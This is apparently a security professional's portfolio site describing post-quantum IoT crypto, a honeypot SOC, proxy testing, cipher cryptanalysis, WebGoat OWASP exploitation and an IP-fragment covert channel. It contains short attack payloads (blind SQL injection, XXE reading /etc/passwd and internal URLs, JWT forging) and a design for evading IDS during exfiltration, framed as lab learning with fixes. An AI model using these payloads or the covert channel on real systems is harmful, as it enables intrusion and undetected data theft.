A documentation hub for security projects I've built and shipped. From post-quantum cryptography implementations to SOC infrastructure, covert communications, and threat detection systems.
Original builds from scratch. Detailed breakdowns.
23× faster quantum-safe handshakes on ESP32 medical sensors using optimized ML-KEM-512 with pre-provisioned keys and session resumption.
Pi-to-Pi KEMTLS implementation with ML-KEM-512, mutual authentication, and encrypted device-bound key storage. Handshake optimization and ESP32 migration planned as future work.
SOC environment with 3 honeypot VMs (2 Windows, 1 Linux) integrated with Microsoft Sentinel. Built custom KQL detection rules for brute force, privilege escalation, and firewall tampering mapped to MITRE ATT&CK.
TLS termination proxy demonstrating host header injection, HTTP method tampering, cookie manipulation, and HTTP vs HTTPS traffic analysis using Burp Suite, ZAP, and Fiddler.
Two-phase project: custom block-cipher combining substitution/Caesar shifts with Fisher-Yates key generation, then cryptanalysis via frequency analysis, bigrams/trigrams, and Levenshtein dictionary validation.
Hands-on exploitation of OWASP Top 10 (A1-A10): SQL injection (blind, boolean-based), IDOR user profile access, XXE→SSRF, JWT attacks, session hijacking, and XSS using WebGoat.
Covert channel using incomplete IP fragments and modulo-encoded IP IDs to transmit hidden messages undetected by IDS/IPS systems.
A documentation hub for security projects I've built and shipped. From post-quantum cryptography implementations to SOC infrastructure and threat detection systems.
Each project breaks down the concepts, explains the "why" behind technical decisions, and walks through real implementations. Built for security professionals, students, and anyone who learns by seeing how things actually work.
Whether you're exploring similar problems, looking for reference implementations, or just want to understand these topics deeper, dive in.
Working on something similar? Have questions about a project? Let's connect.
Pi-to-Pi KEMTLS Implementation for IoMT Security
Quantum computers will break RSA and ECDSA in minutes using Shor's algorithm. Every "secure" connection today uses keys that quantum computers will crack. Medical devices can't just get a firmware update when that happens - they need quantum-resistant crypto now.
Massive public keys and signatures. Not ideal when counting kilobytes.
Needs specialized hardware for efficient implementation.
Authenticates through KEM keys. More efficient in computation and bandwidth.
If the server can prove it knows the secret, it must be the real server. No signature required.
If we just send public keys over the network without verification, an attacker can intercept and substitute their own keys.
Client already has the server's authentic public key installed during manufacturing. When the server sends its key during handshake, the client compares it against what it already knows.
Lattice-based KEM with ~800 byte public keys
No signatures, auth through pre-provisioned keys
Both broker and client verify each other
AES-256-GCM + PBKDF2 key derivation
Master key from password + CPU serial + SD CID
"Learning with errors" is hard even for quantum computers
Trades flexibility for simplicity by pre-installing keys
Proves identity by demonstrating you can decapsulate
Keys tied to hardware become useless if extracted
Pi-to-Pi architecture with full KEMTLS handshake, mutual authentication, and encrypted key storage working on Raspberry Pi 4.
Handshake optimization for lower latency, ESP32 migration for constrained devices, session resumption. See GitHub for full roadmap.
Watch Real Attackers Hit Your Systems
Security Operations Centers (SOCs) are the nerve center of enterprise defense. Analysts sit in front of dashboards watching for threats - but what are they actually looking at? How do you learn to spot an attack when you've never seen one? You can read case studies, but nothing teaches like watching real attackers hit your systems in real-time.
A honeypot flips the script: instead of defending production systems, you deploy intentionally vulnerable systems and invite attackers in. Every connection is suspicious. Every login attempt is data. This project builds a complete SOC environment from scratch - not to stop attacks, but to study them.
The setup mirrors real enterprise environments but with intentional exposure:
2 Windows (RDP on 3389), 1 Linux (SSH on 22). NSG rules initially wide open to attract scanners.
Central log aggregation via Data Collection Rules (DCR) and Azure Monitor Agent (AMA).
Cloud-native SIEM/SOAR. Correlates events, runs analytics rules, generates incidents.
Target resources for privilege escalation. Monitored for unauthorized access attempts.
Raw logs are noise - thousands of events per hour. A successful login, a failed login, a service starting, a file being accessed. The SOC analyst's job isn't to read every log; it's to find the signal in the noise. That's detection engineering.
Think SQL optimized for time-series security data. Every SOC analyst needs KQL fluency - it's how you ask questions like "show me all failed logins from IPs that later succeeded" or "find processes spawned by Word documents."
The challenge: write rules sensitive enough to catch real attacks, but not so broad they drown analysts in false positives. Too many alerts = alert fatigue = missed breaches.
Each rule maps to MITRE ATT&CK - the industry-standard framework categorizing real-world attacker techniques. This isn't academic; these are the same TTPs (Tactics, Techniques, Procedures) used in actual breaches:
10+ failed logins from same IP within 5 minutes triggers alert. Works for both Windows (Event ID 4625) and Linux (/var/log/auth.log). Real attackers use automated tools that try thousands of passwords - this catches them early.
Monitors Azure AD/Entra ID role assignments and local admin group changes. Attackers who get initial access immediately try to escalate - this catches the moment they succeed.
Windows Defender Firewall disabled via netsh or PowerShell. First thing many attackers do after landing - disable defenses. If the firewall goes down unexpectedly, something's wrong.
Suspicious process creation, encoded PowerShell, living-off-the-land binaries (LOLBins). Catches attackers using built-in tools to avoid detection.
To validate detections, I simulated realistic attack scenarios from a separate attacker VM:
Automated RDP/SSH login attempts with common username/password combinations
Malicious commands on Linux VM to generate security events and test detection coverage
Enriched incidents with attacker IP geolocation, built workbooks for visualization
Within 48 hours of deployment, the honeypot was receiving real brute-force attempts from around the world. Internet-facing services with weak credentials get found fast.
You can't detect what you can't see. Centralizing logs is step one of any security program.
Rules that catch attackers without drowning in false positives. It's an art and a science.
Speaking the common language of threat intel. Maps detections to real-world attacker behavior.
Intercept, Analyze, and Understand HTTP Traffic
Every web security professional needs to understand one fundamental concept: the browser lies to you. What you see in DevTools is not necessarily what's being sent to the server. What the server sends back can be modified before your browser renders it. The tool that makes this visible - and manipulable - is a proxy.
A TLS termination proxy sits between your browser and the server, intercepting every request and response. For penetration testers, it's the most important tool in the arsenal. For defenders, understanding how proxies work is essential because this is exactly how your applications will be attacked.
I built a deliberately vulnerable web application to test against:
Local server hosting PHP pages. Full control over server config to test various scenarios.
GET (credentials in URL) vs POST (credentials in body). Demonstrates why this matters.
Implemented with and without security flags to show the difference.
Both versions to compare what's visible with and without encryption.
login.php?user=admin&pass=secret123
This URL gets: logged in server access logs (now your password is in a text file), saved in browser history (anyone with access can see it), sent in Referer headers to external sites, cached by proxies and CDNs, and bookmarked accidentally. Never send sensitive data via GET.
Changed the Host header from localhost to www.google.com in the Intercept tab. Server still returned 200 OK because Host is just for virtual hosting - the request still went to localhost. But this reveals a critical vulnerability: improperly configured servers use Host header in password reset links, cache keys, and redirects. Attackers exploit this for cache poisoning and password reset hijacking.
Used "Change Request Method" to convert POST to GET. Credentials moved from request body to URL parameters. Server accepted it (200 OK), demonstrating that the app doesn't enforce method restrictions. Now those credentials are exposed in logs, history, and Referer headers. Real impact: authentication bypass, logging of sensitive data.
Why do attackers prefer HTTP/1.0? No persistent connections (harder to track), fewer header restrictions, easier proxy manipulation, and many servers have looser validation for legacy protocol support. Changed version in Burp - server accepted HTTP/1.0 with custom headers, proving it's vulnerable to downgrade attacks.
Cookies are how web apps maintain state. Get someone's session cookie, and you are them. ZAP's HUD mode let me intercept responses and inject cookies with different security configurations:
JavaScript can't read cookie via document.cookie. Prevents XSS from stealing sessions.
Only sent over HTTPS. Prevents interception on HTTP downgrade or mixed content.
Controls cross-origin requests. Strict/Lax prevents CSRF attacks.
Key finding: Setting a cookie with an expiration date in the past forces immediate deletion. This is how logout works - and how attackers can force re-authentication.
Captured the same login on both HTTP and HTTPS to visualize the difference:
Headers, syntax view, and raw body all visible in plaintext. Credentials, session tokens, API keys - everything readable. Anyone on the same network (coffee shop WiFi, corporate network, ISP) can see this traffic.
Encrypted blob without proper certificate. Fiddler can only decrypt HTTPS if you install its CA certificate - which is why corporate environments do this for inspection, and why it's a privacy concern.
How proxies decrypt HTTPS by acting as man-in-the-middle with trusted certificates.
Cookies without flags are vulnerable. Defense requires HttpOnly + Secure + SameSite.
Never trust client-controlled data. Validate methods, headers, and origins server-side.
Build the Lock, Then Pick It
Cryptography is one of those fields where you can read textbooks forever and still not truly understand why certain things are secure and others aren't. The gap between "this algorithm uses a 26! key space" and "this algorithm is trivially broken" isn't obvious until you've actually broken something yourself.
This project was born from a simple question: if I design my own cipher - one that combines multiple classical techniques - can I then write code to crack it? The answer taught me more about why modern cryptography works than any lecture could.
Every natural language has a statistical fingerprint. In English, 'E' appears ~12.7% of the time, 'T' ~9%, 'TH' is the most common bigram, 'THE' the most common trigram. This fingerprint survives encryption unless the cipher specifically destroys it, and most classical ciphers don't.
I wanted something more sophisticated than a basic substitution cipher. The design combines two classical techniques in a way I thought might be harder to break:
The theory: combining substitution (confuses letter identity) with shifting (varies by block) should make frequency analysis harder. Each block's Caesar shift depends on its first character, creating a form of key-dependent variation.
The substitution table is the cipher's heart. I implemented three ways to generate it:
hilwmkbdpcvazusjgrynqxofte
Fixed for testing. Known key = known weakness, but useful for validation.
srand(time(0))
Proper random permutation algorithm. Each of 26! arrangements equally likely.
custom 26-letter input
For controlled experiments. Human-chosen keys are often weaker than random.
Why Fisher-Yates? Naive shuffling algorithms (like swapping each element with a random position) don't produce uniform distributions. Fisher-Yates guarantees every permutation has equal probability - a subtle but critical detail in cryptographic key generation.
Here's the uncomfortable truth I discovered: my "sophisticated" cipher is still fundamentally broken. The dual-layer design doesn't eliminate the statistical fingerprint - it just obscures it slightly.
Count frequency of each block's first character. These are pure substitution - no shifting applied.
Match most frequent ciphertext characters to E, T, A, O, I, N. Bigram analysis refines guesses.
Once first char is known, its index determines the shift. Reverse the Caesar cipher on remaining 5.
Understanding why the attack works is more valuable than just knowing that it does:
Fixed 6-character blocks mean the same plaintext always produces the same ciphertext. No initialization vector, no randomization. ECB mode's fatal flaw, repeated here.
The first character of each block gets only substitution - no shift. This creates a pure monoalphabetic subset that's trivially breakable with enough text.
Once you crack the first character, you know the shift. Breaking one breaks five. The cipher's "layers" are actually a single point of failure.
Each block's shift is 0-25. That's 26 possibilities - trivially brute-forceable even without frequency analysis. Modern ciphers need 2^128+ combinations.
Raw frequency analysis produces guesses, not certainties. The breakthrough came from adding dictionary validation to confirm decryption attempts:
Measures the minimum number of single-character edits (insertions, deletions, substitutions) needed to transform one string into another. Distance 0 = exact match. Distance 1 = one typo. This allows fuzzy matching against a 10,000-word English dictionary, catching partial decryptions.
The user can tune three parameters to balance accuracy vs. speed: MAX_DISTANCE (how fuzzy to match), SLIDING_BLOCK_SIZE (segment length to test), and MAX_OPTIONS (recommendations per segment). This makes the tool interactive - the cryptanalyst guides the process rather than waiting for a black-box answer.
Layering weak algorithms doesn't create a strong one. Each layer needs to be independently secure, and their combination mustn't introduce new weaknesses.
If your cipher doesn't destroy the statistical properties of the plaintext, it's vulnerable. Modern ciphers like AES achieve near-perfect diffusion - changing one input bit changes ~50% of output bits.
The lesson every cryptographer learns: use vetted algorithms. I broke my own cipher in hours. Real attackers have more time, resources, and expertise.
I understood frequency analysis conceptually before. After implementing it and watching it decrypt my own ciphertext character by character, I felt why it works.
Learn by Exploiting Real Vulnerabilities
Security certifications teach you what vulnerabilities are. But there's a gap between reading "SQL injection occurs when user input is concatenated into queries" and actually sitting in front of a login form, crafting a payload, watching the database spill its secrets, and thinking "oh, that's why this matters."
WebGoat is OWASP's deliberately vulnerable application - designed to be broken. Every vulnerability from the OWASP Top 10 is implemented here, waiting to be exploited. This isn't theory; it's hands-on offensive security training.
You can't defend against what you don't understand. The best security engineers I've studied under all have offensive backgrounds - they know how attackers think because they've done it themselves (legally). This project was about developing that mindset.
This isn't a theoretical list - it's compiled from real breach data. These are the vulnerabilities that actually get exploited in production systems. If you're building or securing web applications, every item on this list should be second nature.
SQL injection has been on the Top 10 for over two decades. It should be extinct. Yet it still accounts for a significant percentage of breaches because developers keep making the same mistake: concatenating user input into queries.
Tom' AND SUBSTRING(password,1,1)='t' --
The server doesn't show me the password directly. But it behaves differently based on whether my condition is true. If the first character is 't', I get Tom's profile. If not, I get nothing. By iterating through characters and positions, I extract the entire password one character at a time. Slow, but effective - and completely invisible in application logs.
The Fix: Parameterized queries. Never, ever concatenate user input into SQL. ORMs help but aren't foolproof - raw queries in ORM code are still vulnerable.
Insecure Direct Object References sound complicated. They're not. It's when the application checks if you're logged in but doesn't check if you're allowed to access that specific resource.
/IDOR/profile/2342384 → /IDOR/profile/2342385 → /IDOR/profile/2342386
I'm logged in as user 2342384. What if I just change the ID in the URL? In a vulnerable application, I can view anyone's profile. Worse: if PUT/PATCH requests are similarly unprotected, I can modify other users' data. I fuzzed user IDs, found valid profiles, and modified them - all while the application thought I was only accessing my own account.
The Fix: Authorization checks on every request. The question isn't "is this user logged in?" but "is this user allowed to access this specific resource?"
XML External Entity injection exploits XML parsers that process external entity declarations. By itself, it can read local files. But the real power comes from chaining it into other attacks.
<!ENTITY xxe SYSTEM "file:///etc/passwd">
The XML parser fetches the local file and includes its contents in the response. I can read any file the web server has access to.
<!ENTITY xxe SYSTEM "http://internal-api/">
The parser will fetch URLs too. Now I can access internal services that aren't exposed to the internet - cloud metadata endpoints, internal APIs, admin panels.
The Fix: Disable external entity processing in XML parsers. Most modern parsers have this disabled by default, but legacy code often enables it explicitly.
JSON Web Tokens are everywhere - they're how most modern applications handle authentication. But they're often implemented incorrectly, creating serious vulnerabilities.
Some libraries accept "alg": "none" - a token with no signature at all. Or I can switch from RS256 (asymmetric) to HS256 (symmetric) and sign with the public key.
JWTs signed with weak secrets can be cracked offline. I captured tokens, ran them through hashcat, recovered the secret, and could forge any token I wanted.
Once I can forge signatures, I modify claims: change "user" to "admin", extend expiration, add permissions. The server trusts what's in the token.
Combined with XSS, I can steal JWTs from other users. Unlike session cookies with HttpOnly, JWTs stored in localStorage are accessible to JavaScript.
The OWASP Top 10 is just the start. Each vulnerability teaches a different lesson about trust, validation, and defense:
Every vulnerability follows the same approach - the same methodology used in real penetration tests:
Step 6 is what separates security researchers from attackers. Every exploit I performed, I documented the fix. Understanding both sides is what makes a complete security professional.
Every input vector is an attack surface. Parameters, headers, cookies, file uploads - assume all of it is malicious until proven otherwise.
No single control is sufficient. WAF, input validation, parameterized queries, CSP, CORS - each layer catches what the others miss.
When SQLi happens (and it will), the database user shouldn't have DROP privileges. Limit blast radius at every level.
COmmunicating Through Incomplete IP Packets
Most security focuses on what data is being sent - inspecting payloads for malware, scanning for suspicious patterns, blocking known-bad signatures. But what if the data itself looks completely innocent? What if the secret message is hidden not in the content, but in the structure of the communication itself?
This is the domain of covert channels - communication paths that were never intended by the system designers. They exploit the gap between what a protocol is supposed to do and what it can do. This project implements COTIIP (COmmunicating Through Incomplete IP Packets), based on research by Tommasi et al. at the University of Salento.
From a defender's perspective, covert channels represent a fundamental blind spot. From an attacker's perspective, they're a way to exfiltrate data past even sophisticated security controls.
An attacker with code execution but blocked outbound connections can still exfiltrate data through protocol manipulation. Firewalls see "normal" traffic.
Malware can receive instructions hidden in seemingly innocuous network traffic - DNS responses, ICMP packets, or malformed TCP headers.
Understanding how these channels work is essential for both building better defenses and understanding the sophistication of modern threats.
When an IP packet is too large for the network's Maximum Transmission Unit (MTU), it gets fragmented. The receiver collects all fragments and reassembles them before passing data to the transport layer. This is normal, expected behavior - but it creates opportunities.
Identification: 16-bit field that identifies which fragments belong together. Fragment Offset: Where this fragment fits in the original packet. Flags: MF (More Fragments) indicates more are coming. These fields exist purely for reassembly - and can be manipulated.
COTIIP exploits a simple insight: the sender transmits packets with sequentially incrementing IP IDs, but deliberately sends some as incomplete fragments (first fragment with MF bit set, remaining fragments never sent). The receiver decodes the message by noting which IP IDs are missing or incomplete.
Characters are encoded using IP_ID mod n where n=37 (26 letters + 10 digits + space). For example, if a packet with ID 14322 is incomplete, the encoded character is 14322 mod 37 = 3 = 'd'. The receiver collects all missing/incomplete IDs and decodes the message.
Sequential IP IDs with complete, normal traffic
Send incomplete fragments (MF=1, no follow-up) at specific IDs
Network sees reassembly timeouts - normal packet loss
Receiver applies modulo to missing IDs to recover message
The genius of this technique is what security tools don't look at:
Payload inspection - scanning the actual data content for malware signatures, suspicious patterns, sensitive data. The assumption is that malicious data lives in the payload.
Protocol headers - which are typically trusted. The payload can be completely empty or filled with random bytes. The real data is in the structure, not the content.
In Wireshark, these packets show up as "fragment overlap" or "reassembly error" - logged as network glitches, not data exfiltration. A busy analyst would scroll right past them.
Built in C using raw sockets to forge IP packets. The sender transmits packets with incrementing IDs, sending incomplete fragments (MF bit set, no follow-up) when the ID mod 37 matches the character to encode. The receiver sorts incoming IDs and decodes the message from the gaps.
Forges IP packets with raw sockets, sends incomplete fragments at calculated ID values
Monitors IP IDs, identifies missing/incomplete packets, applies modulo to decode message
Tested across multiple network hops with firewalls and security systems in path
Bandwidth is inherently low - covert channels trade speed for stealth. Real-world network packet loss can cause decoding errors, requiring error correction mechanisms for reliability. The channel remains invisible to standard security monitoring.
Understanding how to build covert channels teaches you how to detect them:
Normal traffic has characteristic patterns. Covert channels often show unusual distributions in fields like TTL, fragment counts, or inter-packet timing.
Track reassembly failures over time. A sudden spike in "corrupted" fragments from a specific host might indicate covert communication.
Data can hide in structure, not just content. Every protocol field is a potential carrier.
Payload-only inspection misses header-based attacks. Security must consider the entire packet.
A core Internet mechanism becomes an attack vector. Legacy features often hide security risks.
A Practical Approach for Next-Generation Healthcare Devices
Healthcare now relies heavily on IoMT devices that communicate continuously over networks. These devices generate real-time clinical data that must remain confidential and tamper-proof. Their limited hardware makes strong security difficult to apply efficiently, and new computing advancements are introducing risks that current cryptography cannot fully withstand.
Attackers can capture encrypted medical data today and decrypt it in the future once quantum systems mature.
Quantum computers will be able to break RSA and ECC, the algorithms that currently protect IoMT communication.
IoMT devices rely on secure channels vulnerable to future quantum attacks, making long-term data protection critical.
Quantum computing will break classical cryptography used in healthcare systems.
New algorithms designed to remain secure even against quantum-level attacks.
A standardized lattice-based PQC algorithm used for efficient quantum-safe key establishment.
Global standards are moving toward PQC, making early adoption critical for long-term security.
Medical IoT devices are extremely resource-constrained. PQC algorithms are secure but computationally heavy. Our solution: an optimized PQC implementation tailored for medical IoT workloads - quantum-safe security with practical real-time performance.
ESP32 microcontrollers (sensor nodes), Raspberry Pi (MQTT broker with failover)
ML-KEM-512 for PQ key exchange, AES-256-GCM for symmetric encryption, pre-provisioned public keys
Hover over bars to see exact values
Signature verification completely eliminated
KEMTLS shows much more consistent performance
Altered ECG or sensor data can mislead clinicians and impact patient safety.
Compromised keys allow attackers to impersonate medical devices and inject false data.
Medical records stay sensitive for decades - attackers can "harvest now, decrypt later".
Weak IoT devices can infiltrate hospital networks and access critical systems.
PQC integration without redesigning existing medical infrastructure.
Hybrid compatibility: classical + PQC for smooth transitional deployment.
Pre-provisioned PQC keys simplify device onboarding and provisioning.
Seamless integration into existing IoMT communication flows.
Quantum threats are inevitable - preparation must start now.
Medical IoT needs optimized, not generic, PQC solutions. Our implementation shows PQC can be efficient even on constrained devices, supporting real-world migration and commercialization opportunities.